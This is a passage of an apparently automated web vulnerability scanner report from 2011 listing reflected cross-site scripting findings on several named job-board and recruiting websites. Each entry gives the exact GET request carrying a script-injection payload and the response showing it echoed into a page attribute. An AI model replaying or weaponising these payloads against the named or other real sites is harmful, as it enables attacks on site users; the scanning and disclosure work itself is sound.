The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27cd5"><script>alert(1)</script>8bdd32819ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?27cd5"><script>alert(1)</script>8bdd32819ff=1 HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9ft9gv5ubep1dgi1aaiqfl30e1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122002

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.advertisingcrossing.com/?27cd5"><script>alert(1)</script>8bdd32819ff=1">
...[SNIP]...

3.7. http://www.aerospacecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aerospacecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a515"><script>alert(1)</script>e723cb62ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9a515"><script>alert(1)</script>e723cb62ba=1 HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n2un0qqkikvurgvbtcinkgoti7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109453

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.aerospacecrossing.com/?9a515"><script>alert(1)</script>e723cb62ba=1">
...[SNIP]...

3.8. http://www.agriculturalcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.agriculturalcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bfb"><script>alert(1)</script>167dae7435c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?44bfb"><script>alert(1)</script>167dae7435c=1 HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9e2jfijg4pt89plgbsc9greko6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102580

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.agriculturalcrossing.com/?44bfb"><script>alert(1)</script>167dae7435c=1">
...[SNIP]...

3.9. http://www.aharrisonbarnes.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69719'><script>alert(1)</script>1fd47fb9727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69719\'><script>alert(1)</script>1fd47fb9727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?69719'><script>alert(1)</script>1fd47fb9727=1 HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:06 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=184erm2kcqjgd8l1dqllt4pas5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648528; expires=Sat, 21-Jan-2012 22:22:08 GMT; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91404

<script>
function ValidatorTrim_video(s)
{
var m = s.match(/^\s*(\S+(\s+\S+)*)\s*$/);
return (m == null) ? "" : m[1];
}

function checkEmail_video(strng)
{
   var error = "";
   if (strng == "")

...[SNIP]...
<form name='mrt_sub_form' id='mrt_sub_form' method='POST' action='http://www.aharrisonbarnes.com/index.php?69719\'><script>alert(1)</script>1fd47fb9727=1'>
...[SNIP]...

3.10. http://www.architecturecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.architecturecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65f46"><script>alert(1)</script>4362759dd83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?65f46"><script>alert(1)</script>4362759dd83=1 HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:00 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t0mrcek43plfm1nbkvfa8s5475; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:00 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125437

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.architecturecrossing.com/?65f46"><script>alert(1)</script>4362759dd83=1">
...[SNIP]...

3.11. http://www.auditorcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.auditorcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ed6"><script>alert(1)</script>7d1d61e5318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d4ed6"><script>alert(1)</script>7d1d61e5318=1 HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:00 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ifgrkcdgfg30p4jfql24nnum63; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:00 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125557

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.auditorcrossing.com/?d4ed6"><script>alert(1)</script>7d1d61e5318=1">
...[SNIP]...

3.12. http://www.automotivecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automotivecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d55b"><script>alert(1)</script>709fa56540f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3d55b"><script>alert(1)</script>709fa56540f=1 HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=00ecl9mekiv0j9dgolrk0k94n0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109200

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.automotivecrossing.com/?3d55b"><script>alert(1)</script>709fa56540f=1">
...[SNIP]...

3.13. http://www.aviationcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aviationcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2428f"><script>alert(1)</script>7d6abdc0dd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2428f"><script>alert(1)</script>7d6abdc0dd3=1 HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:10 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lkn6lmhpp9f0snqdnfsosfppg4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123255

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.aviationcrossing.com/?2428f"><script>alert(1)</script>7d6abdc0dd3=1">
...[SNIP]...

3.14. http://www.bcgsearch.com/searchresults.php [key parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 652f4"><a>5cf13bb15d1 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /searchresults.php?key=OP3V61427652f4"><a>5cf13bb15d1 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=a892eukh7ovae4jmcsqhkevdk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68788

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<link rel="canonical" href="http://www.bcgsearch.com/searchresults.php?key=OP3V61427652f4"><a>5cf13bb15d1" />
...[SNIP]...

3.15. http://www.bcgsearch.com/searchresults.php [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72118"><script>alert(1)</script>118f3550af9 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.php?key=OP3V6142772118"><script>alert(1)</script>118f3550af9 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 20:01:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=rmpahjvejlm5e0t1hefelupr22; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68942

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<link rel="canonical" href="http://www.bcgsearch.com/searchresults.php?key=OP3V6142772118"><script>alert(1)</script>118f3550af9" />
...[SNIP]...

3.16. http://www.bcgsearch.com/searchresults.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b4b"><script>alert(1)</script>65ee7e46726 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.php?c5b4b"><script>alert(1)</script>65ee7e46726=1 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=oe75j7p7vu4b8kk2unodlqkfe7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68865

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<link rel="canonical" href="http://www.bcgsearch.com/searchresults.php?c5b4b"><script>alert(1)</script>65ee7e46726=1" />
...[SNIP]...

3.17. http://www.bilingualcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bilingualcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70508"><script>alert(1)</script>8ee9c52dde1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?70508"><script>alert(1)</script>8ee9c52dde1=1 HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=no661p4827foa2ncnmfljmp3l0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:13 GMT
